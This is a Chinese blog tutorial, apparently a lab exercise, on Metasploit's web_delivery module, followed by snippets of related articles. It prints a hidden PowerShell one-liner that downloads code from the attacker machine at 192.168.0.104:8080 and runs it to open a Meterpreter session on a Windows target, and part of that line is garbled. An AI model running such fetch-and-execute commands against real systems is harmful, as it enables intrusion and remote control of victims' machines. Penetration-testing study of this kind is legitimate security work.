metasploit之webdelivery

最新推荐文章于 2023-05-15 20:24:50 发布
最新推荐文章于 2023-05-15 20:24:50 发布
阅读量1.2k 收藏 2
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yalecaltech/article/details/86719208
版权

介绍下webdelivery模块
先是启动metasploit
在这里插入图片描述
接下来选择我们使用的模块
在这里插入图片描述
Show options看看我们需要设置哪些参数

在这里插入图片描述在这里插入图片描述
我们注意到,exploit target出现了python,,莫非还有其他的?我们使用show targets来看看
在这里插入图片描述
2代表的PSH表示的powershell。我们这次的实验针对的是windows的,考虑到不是所有windows用户都会有python,php的环境,所以不如我们选择powershell吧
所以我们set target 2
在这里插入图片描述
再show options看看还需要设置哪些
在这里插入图片描述
我们依次设置好就可以了
在这里插入图片描述
接下来执行攻击
在这里插入图片描述
可以看到我们接收到一串字符串如下:
powershell.exe -nop -w hidden -c M = n e w − o b j e c t n e t . w e b c l i e n t ; M=new-object net.webclient; M=newobjectnet.webclient;M.proxy=[Net.WebRequest]::GetSystemWebProxy();$M.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $M.downloadstring(‘http://192.168.0.104:8080/’);
我们只需要把这串字符串在windows环境下cmd中执行就可以了
在这里插入图片描述
然后回车
这时候回到kali
可以看到
在这里插入图片描述
说明攻击成功了
可以看下会话列表
在这里插入图片描述
注:此处102是我们的靶机,104是我们的攻击机
我们在上图顺便指定了拿到的会话,这就就来到了meterpreter的交互
在这里插入图片描述
拿到meterpreter之后可以做什么呢?我们在metasploit后渗透的课程里已经给大家介绍过了,这里就不再重复了~~
扩展资料:https://www.anquanke.com/post/id/86784(与此模块相关的关于劫持无线鼠标的资料,有兴趣的同学可以看看)

Elwood Ying
关注
metasploit
qq_46303643的博客
03-19 510
一、 实验目的 熟悉Metasploit的基本操作; 针对一个系统的漏洞实施渗透。 二、实验内容 1.熟悉metasploit的几个基本命令 2.使用metasploit攻击靶机metasploitable 3.利用msf对MS10_018漏洞进行渗透测试 3.利用Armitage黑入metasploitable 三、实验环境 Kali-linux-2020.1 四、实验步骤 1.基本操作 1....
一条命令上线MSF(Metasploit)-web_delivery模块
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
10-31 2606
一条命令上线MSF(Metasploit)-web_delivery模块
msf web_delivery模块攻击
dichengpai8268的博客
05-03 397
目标机:win7 ip:192.168.31.136 攻击机:kai liunx ip:192.168.31.54 一.使用web_delivery模块的regsvr32_applocker_bypass_server 1.打开神器metasploit,终端输入msfconsole 2.搜索we...
Msf - web_delivery
Nixawk
02-22 1871
Python Payload Modemsf exploit(web_delivery) > show options Module options (exploit/multi/script/web_delivery): Name Current Setting Required Description ---- --------------- --------
MSF:web_delivery模块使用测试(Windows)
beefreesky的博客
12-29 278
Windows环境下,MSF web_delivery模块使用测试
msf中exploit的web_delivery模块
weixin_30300523的博客
03-11 293
背景:目标设备存在远程文件包含漏洞或者命令注入漏洞,想在目标设备上加载webshell,但不想在目标设备硬盘上留下任何webshell文件信息 解决思路:让目标设备从远端服务器加载webshell代码至内存执行 错误尝试:远端服务器开启web服务,让目标设备来调取。(错误点:默认情况下目标设备来调取的时候其实是将webshell在远端服务器执行,并不是将文件加载至自己内存执行) ...
利用Metasploit进行Web应用渗透测试
介绍Metasploit ## 1.1 Metasploit概述 Metasploit是一个开源的渗透测试框架,广泛用于网络和系统安全评估。它提供了一系列强大的工具和模块,帮助安全专业人员识别和利用系统和应用程序中的漏洞。Metasploit由...
提权学习之旅——利用Metasploit提权
Lemon's blog
08-16 716
1
Metasploit渗透测试之制作隐藏后门:网站渗透与远程命令执行
### 1.1 什么是Metasploit渗透测试 Metasploit渗透测试是一种测试网络和系统安全性的方法,通过模拟黑客攻击的方式来评估目标系统的安全性。Metasploit是一个开源的渗透测试框架,提供了一系列工具和技术来进行网络...
Metasploit渗透测试实战技巧:Metasploit远程主机弱口令攻击技巧
## 1.1 Metasploit渗透测试工具概述 Metasploit是一款开源的渗透测试工具,旨在帮助安全研究人员和渗透测试人员发现及利用安全漏洞。它提供了一套丰富的漏洞利用模块、Payload生成器以及一套强大的渗透测试工具集合...
Metasploit客户端攻击原理与实践
# 1. 简介 ## 1.1 Metasploit简介 Metasploit是一款开源的渗透测试框架,...Metasploit框架包括Metasploit Framework核心、数据库和web接口等多个组件,能够帮助安全专业人员更高效地进行渗透测试。 ## 1.2 客户端攻
msf利用web_delivery模块 攻击windows实例
最新发布
cuteyann的博客
05-15 654
目标机存在命令注入漏洞,使用web_delivery模块生成的一条命令建立连接,并且不会在目标主机磁盘写文件,留下文件信息。7、在复制的命令前添加127.0.0.1 && (因为&&命令执行),然后在dvwa命令注入靶场中提交。这里使用比较老的python做webshell就可以了,输入命令:set target 0。(在目标机的cmd也可执行,前提是目标机已经安装了python)8、查看session,然后连接,就可用对目标机进行操作啦。红框里就是生成的命令,把它复制下来。6、运行,输入命令:run。
msf web_delivery模块攻击实战操作
欢迎来到神林的博客
04-14 2674
1.打开神器metasploit,终端输入msfconsole(我建议直接图形界面单击打开,方便啊)2.搜索web_delivery模块:search web_delivery3.使用命令:use exploit/multi/script/web_delivery4.设置攻击机Ip:set lhost (这里是你自己的ip)5.运行,exploit,生成:payload:   python -c ...
(记录向)使用MSF的web_delivery模块上线
daxi0ng的博客
11-30 1444
前言:在msf上生成木马传到目标机器执行上线累死个人,还是一条命令上线比较舒服。 目标环境: Centos6.5 1、选择exploit/multi/script/web_delivery模块 2、选择目标系统,我这里选择Linux 3、选择payload,我这里选择linux/x64/meterpreter/reverse_tcp , 4、本机监听一下 5、运行,生成一条命令 6、目标机器执行上线。 7、获取一个友好的交互界面。python -c 'import ...
DMZ下使用web_delivery 介绍
每天多一分钟学习,生命就多一份精彩
06-08 1327
From : http://evi1cg.me/archives/Use_Web_delivery_Under_DMZ.html?utm_source=tuicool&utm_medium=referral 之前碰到的问题,自己的主机做了DMZ,设置[b]web_delivery[/b]时,发现将lhost设置成外网ip,则脚本不能运行,如果设置成内网ip,则反弹payload反弹的
使用Metasploit web_delivery 反弹shell
大方子
02-07 5413
MetasploitWeb Delivery Script是一个多功能模块,可在托管有效负载的攻击机器上创建服务器。当受害者连接到攻击服务器时,负载将在受害者机器上执行。 此漏洞需要一种在受害机器上执行命令的方法。特别是你必须能够从受害者到达攻击机器。远程命令执行是使用此模块的攻击向量的一个很好的例子。Web Delivery脚本适用于php,python和基于PowerShell的应用程序。 当攻击者对系统有一定的控制权时,这种攻击成为一种非常有用的工具,但不具有完整的shell。另外,由于服务器和有效
msf_web_delivery模块漏洞(win7以上注册表)
芥子
01-25 1068
目标机:win10   ip:192.168.1.8 攻击机:kali Linux    ip:192.168.1.63 一:直接打开metasploit,也可在终端直接输入msfconsole msf的用法:  查找web_delivery模块: search web_delivery 使用web_delivery模块:use exploit/windows/misc/
MSF:web_delivery模块使用测试(Linux)
beefreesky的博客
12-29 252
linux环境下,MSF web_delivery模块使用测试。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值